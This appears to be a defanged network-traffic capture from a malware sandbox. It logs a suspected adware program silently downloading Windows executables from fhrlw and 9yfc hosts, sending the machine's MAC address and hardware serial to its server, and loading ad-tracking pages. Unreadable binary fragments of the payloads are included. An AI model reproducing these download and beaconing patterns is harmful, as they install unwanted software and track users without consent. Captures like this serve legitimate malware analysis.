T.u..}./..^.O.>...Gy...[.........B......:..A.......ba..%n.3.o.vz..o.5..k....q.n...HE.(...}[.......I<g...2...%UP........}.c..............`.U(dT....w.1.b...\C.f%.,.A.F....v.#.W/...q.F..Zu2...7"..I.....V ..AB.._2T...f.....'&.~d..`..X;..~4...$....8V.._.........Sj.g..<W.BC...T.Ca.MD.w.Y.=......,3..g_.........p.......z).B`.kL..n]{%#o.[uC,....v......l...\ ..5.d..L.e...h..../..E.............X.G..0qzN.0..z...S.....nr.p...."U.'.....2.B...]...o..W.V...h...~..}.^f..x..h.............."X)V....o..CX.m.M.t.x.E..?...P$8.sIk...!"H...U=`.........xR......9.,o.....P8..{...o.NND...~..l.i....e......n.....&h{..=.h^r|g..v.0H...P.M.=\..t.N..i...4.n...0.c...i.8.."~q.".IyZ.=1...e.=....y.......G.IX.r\p......$).#..N..P.0G

<<

<<< skipped >>>

GET /slience/fhsli_6_12001.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: software.fhrlw.cn

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Length: 335364

Content-Type: application/octet-stream

Last-Modified: Wed, 28 May 2014 05:49:52 GMT

Accept-Ranges: bytes

ETag: "261b13a5387acf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:31 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u...u...u.......w...u...........d.......|.......t...Richu...................PE..L.....UH.................b....... ..o5............@..........................0...........................................................@...........................................................................................................text...x`.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata...@...............................rsrc....@.......B..................@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......D..H.P.u..u..u...T.@..X...SV.5..D..E.WP.u...X.@..e...E..E.P.u...\.@..}..e..9}...D.@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...e....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.RD.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....D...Si.. ..VW.T.....tO.q.3.;5..D.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..D.r._

<<

<<< skipped >>>

GET /cs/jsfile/js/c.js HTTP/1.1

Accept: */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: images.sohu.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/x-javascript

Transfer-Encoding: chunked

Connection: keep-alive

Server: FSS

Date: Sat, 14 Jun 2014 08:25:51 GMT

Last-Modified: Mon, 26 May 2014 07:18:20 GMT

Expires: Sat, 14 Jun 2014 09:25:51 GMT

Cache-Control: max-age=3600

Content-Encoding: gzip

FSS-Cache: HIT from 15041145.21594755.22842845

43a.............}.w.8.._Iu.z.Zq.g.;JO....L.6......Y.[.,9..........).I;..o....... .. ...N.....,.$.....-....[;..T$i#=X.n.&.n._C....7.o..&....tl.....2......4.|].<a@.<Y...:i-...s..p...q..y..Gyzw.....u...u..a<.....S.7..4.8....i6G..t...sl#Z..AB=[.jj.......NF9....0;.O.._g..$M..e.p...!%.}.4......5.O0m..#H|?..nn.k..y.y.....mS.~.'.n.j.K'...Wi..j...}...B.(...:.m..N..9.A..$.u...Y.....;?..c?-%R..._$I.;.q...*.w...-y.H...i.....}qI. ..Q.....`n'...'.t.8....&.^.....O....'..Kc#.k...m......jA:..p.....i.'. ...:Q............g8.......?...O.;}a ..:.......y.%./.%.>a.DU...OIr..j.....1.Z.4.r.`.....{R~.2.:Q..o...k.gnF../...3@..y^].Y.\$..|-g...H..WF.%....T..(..g/.s.v....zd.&.$....i..Er.h0i.....F..&........^....}.R...."t5.x.m..$...;....%?..U...R...^Co..[.U6....I..%(.'a.....O.I)%..J..%...{...)......2{~quI...z.$3..$...t.....L.G&1.xF...*~*.........UF....K..3.....F..D.... ..O.....e.....H].1..L$P..v...OL.O*..~=..h...4KM..F...w.....m.....or.YV...V..Rw..H1..........;..6..t<gb.h.P.f.\..0.....U3..g..(.m...&-.0...F...U....'...M.>..'>Z..G1.4...."&b........v........A...R*..0c0..<.C...K.@.......F.q......X......X..32de..W......4.*.b}.......&....d..b..#/.>*....U"..I.....Y2.J5...-@C..$r.....`V...5.-5r.....".70.X.d..T....< j..[^..N.hh....@...i.......?.......f........$.s....uy).q.L./0Y...*.8......%.5s.=Rj.D*..2..R...K[<...t.n...4a.....E.............j..(.i.8.=..a....<...i&....nY-K3y..%.G..&7.W...w..E..;.g.....3..V.g..;........O.Opz.bk....Z4.Y.AOhR..B.|....K....:t>....HV..k..~...>.,s=f....lH.>g....4.....n...*..b...

<<

<<< skipped >>>

GET /client/picchange.css HTTP/1.1

Accept: */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img.fhrlw.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 584

Content-Type: text/css

Last-Modified: Thu, 08 May 2014 04:11:16 GMT

Accept-Ranges: bytes

ETag: "fddeeb8e736acf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:24 GMT

html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, fieldset, input, textarea, p, blockquote, th, td {.. margin: 0;.. padding: 0;..}..ol, ul {.. list-style: none outside none;..}...main{position: relative; width:340px;height: 60px;}...main div{width:100%;overflow:hidden;}...main .adlist{display:none;}...main .sel{display:block;}...showList{position:absolute;bottom:2px;right:0px;}...showList li{float:left;width:8px;height:8px;background:#eaeaea;color:#eaeaea;margin-right:5px;font-size:0;}...showList li.special{background:#4384da;color:#4384da;}HTTP/1.1 200 OK..Content-Length: 584..Content-Type: text/css..Last-Modified: Thu, 08 May 2014 04:11:16 GMT..Accept-Ranges: bytes..ETag: "fddeeb8e736acf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:01:24 GMT..html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, fieldset, input, textarea, p, blockquote, th, td {.. margin: 0;.. padding: 0;..}..ol, ul {.. list-style: none outside none;..}...main{position: relative; width:340px;height: 60px;}...main div{width:100%;overflow:hidden;}...main .adlist{display:none;}...main .sel{display:block;}...showList{position:absolute;bottom:2px;right:0px;}...showList li{float:left;width:8px;height:8px;background:#eaeaea;color:#eaeaea;margin-right:5px;font-size:0;}...showList li.special{background:#4384da;color:#4384da;}....

<<

<<< skipped >>>

GET //js/picchange.js HTTP/1.1

Accept: */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img.fhrlw.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 908

Content-Type: application/x-javascript

Last-Modified: Thu, 08 May 2014 03:52:46 GMT

Accept-Ranges: bytes

ETag: "eeb3d4f8706acf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:31 GMT

var thisIndex=0;..var bannerLength = $('.main .adlist').length;..for(i=0; i<bannerLength; i ){...$('.showList li').eq(i).text(i 1);..}..function ChangePic()..{...indexobj = $('.showList li').eq(thisIndex);...$('.showList li').removeClass('special');...indexobj.toggleClass('special');...obj = $('.main .adlist').eq(thisIndex);...$('.main div').removeClass('sel');...obj.addClass('sel');......thisIndex = thisIndex 1>=bannerLength? 0 : thisIndex 1;..}.. ..$('.main .adlist').hover(function(){...window.clearInterval(timer);..},function(){...timer = window.setInterval( "ChangePic()" , 5000 );..})..$('.showList li').hover(function(){...window.clearInterval(timer);...thisIndex = parseInt(this.innerHTML) - 1;...ChangePic();..},function(){...timer = window.setInterval( "ChangePic()" , 5000 );..})....$(function(){... ...timer = window.setInterval( "ChangePic()" , 5000 );...ChangePic();..})HTTP/1.1 200 OK..Content-Length: 908..Content-Type: application/x-javascript..Last-Modified: Thu, 08 May 2014 03:52:46 GMT..Accept-Ranges: bytes..ETag: "eeb3d4f8706acf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:01:31 GMT..var thisIndex=0;..var bannerLength = $('.main .adlist').length;..for(i=0; i<bannerLength; i ){...$('.showList li').eq(i).text(i 1);..}..function ChangePic()..{...indexobj = $('.showList li').eq(thisIndex);...$('.showList li').removeClass('special');...indexobj.toggleClass('special');...obj = $('.main .adlist').eq(thisIndex);...$('.main div').removeClass('sel');...

<<

<<< skipped >>>

GET /Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 HTTP/1.1

User-Agent: FhCalendar

Host: client.fhrlw.com

HTTP/1.1 200 OK

Date: Sat, 14 Jun 2014 09:01:23 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/plain; charset=utf-8

Content-Length: 13

{"errno":"1"}....

GET /ad/fixad.html?id=9995 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: client.fhrlw.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 1737

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Date: Sat, 14 Jun 2014 09:01:23 GMT

..<style type="text/css">.. body.. {.. margin: 0;.. border: 0;.. }..</style>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head><title>..</title><meta http-equiv="refresh" content="600" />.. <link href="hXXp://img.fhrlw.com/client/picchange.css".. rel="stylesheet" type="text/css" />.. .. <script src="hXXp://img.fhrlw.com/js/jquery-1.3.2.min.js".. type="text/javascript"></script>.. <script>.. window.onerror = function() { return true; };.. $(document).ready(function() {.. $(document).bind("contextmenu", function(e) {.. return false;.. });.. });.. </script>..</head>..<body scroll="no">.. <div class="main">.. <div class="adlist sel"><script type="text/javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.</script>.<script type=text/javascript src=hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div><div class="adlist "><script type="text/javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.</script>.<script type=text/javascript src=hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div><div class="adlist "><script type="text/javascript">.var sogou_ad_id=3412

<<

<<< skipped >>>

GET /qi HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dspcm.brand.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:44 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: YYID =

a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:44 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0......

GET /pixel?tid=E0&ver=1&extendata= HTTP/1.1

Accept: */*

Referer: hXXp://dspcm.brand.sogou.com/qi

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=

Connection: Keep-Alive

Host: dspcm.brand.sogou.com

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:46 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: YYID =

6..hello...0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:46 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..6..hello...0......

GET /qi HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dspcm.brand.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:47 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: YYID =

a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:47 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0......

GET /qi HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dspcm.brand.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; YYID=

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:47 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: YYID =

a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:47 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..

GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1

Accept: */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: inte.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:44 GMT

Content-Type: text/plain

Content-Length: 160

Connection: keep-alive

Cache-Control: no-cache

Pragma: no-cache

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Expires: Mon, 26 Jul 1997 08:00:00 GMT

Last-Modified: Sat Jun 14 17:00:44 2014

X-XSS-Protection: 0

SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});....

GET /ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: inte.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:44 GMT

Content-Type: text/html

Content-Length: 7434

Connection: keep-alive

Cache-Control: no-cache

Pragma: no-cache

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Set-Cookie: ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:44 GMT; domain=.sogou.com

Expires: Mon, 26 Jul 1997 08:00:00 GMT

Last-Modified: Sat Jun 14 17:00:44 2014

X-XSS-Protection: 0

<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||

<<

<<< skipped >>>

GET /xxdd_165.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: ddl.9yfc.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.12

Date: Sat, 14 Jun 2014 08:56:32 GMT

Content-Type: application/octet-stream

Content-Length: 4409157

Last-Modified: Sat, 31 May 2014 06:56:10 GMT

Connection: keep-alive

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s...........8...........................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc....8.......:...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=204800-409600

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 204800-409600/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:48 GMT

.gW5#.........1L.fM..TgI..._..(..a.`.. kf........M3....{.K.:\.>....x....a..e....!.......N=.!.G.d....z..".....aY.=....9...}k$.....=e.....r.W|.C.Qg..."....sA'...P.RR.....!....9ei.l.....N.....OR>.//..0.=..U.I.e.......p....*..U......L.2[...q........B.....l.2.mj3^.k.'3..C......IF.r7.$(F\........8/..|...l..((.;w.)....."q.?...rmG......[(@b.T,Tvy.A.\.ZJZ...=..#....c.U!X..m.#o.. ..............V....=......3..~.....$.1..K$B6.petx..!.....z.~6G7..^...l.....?ccM....a.E.........7...........tTJ."..%O.........._Lnv....Q-H..0....]..NcQ..'.e..`...7.7.......\...>....|.D.K/:>...a...M.......X.z.q....O..[..GP_i....p....l(.\7....<(..];.. ....\y.F..n?...3..a.....Az..Q...e.z?8.,%.,8.;....I..3......_.,.sZ..d.../U.....Y1..N.Mu.a.....T....$.B........s....e.:.?...Mmw. .e}..c.........C....>.....7...-K.^..>..]...kO....;B.D*..._o..9{..{....x..V ..2.C..e|.....a"C[......S{.......Z......0X.Mff.G.~]%..&C0.||=3;.Zd....q..o.I.....y{.9v...Jl..kt~.$5ON....3TT.x....b....<....$.b,.G.|r..../.....i.. ......q$P.P.g#.....0.}..<..GjFx.......QhEr/.f.D..}....*.Uu...W^E..)."....gx.VGa.k....4.d~.A|....a.....;...B1.....u.....?....}B...{.n..%.`.\...6l...;V.. .]......w.k.=V......VY"...}.L.....ee......n..Dn.B..[.....|.".............t..x.mF.#P...._.V.?...I.M;bq.U..{....(..{..P.7.V...k..k...%...gg..p..-...\$.c$....J..K.I.s.....=e.8v.....Y..R....U....%w....{.w......X..uKqCT........e..T<..8.........EB".....@.....Q.up.[..K..M..a.7..5h.. .t~D.x. .~>b)S5..:..`.....7...Z&.C.....@P...*<7{H*..d...E*n.....f...x.E)..B.....;;..f..I.j.....k@e..

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=2252800-2457600

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 174816

Content-Type: application/octet-stream

Content-Range: bytes 2252800-2427615/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:15 GMT

...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... 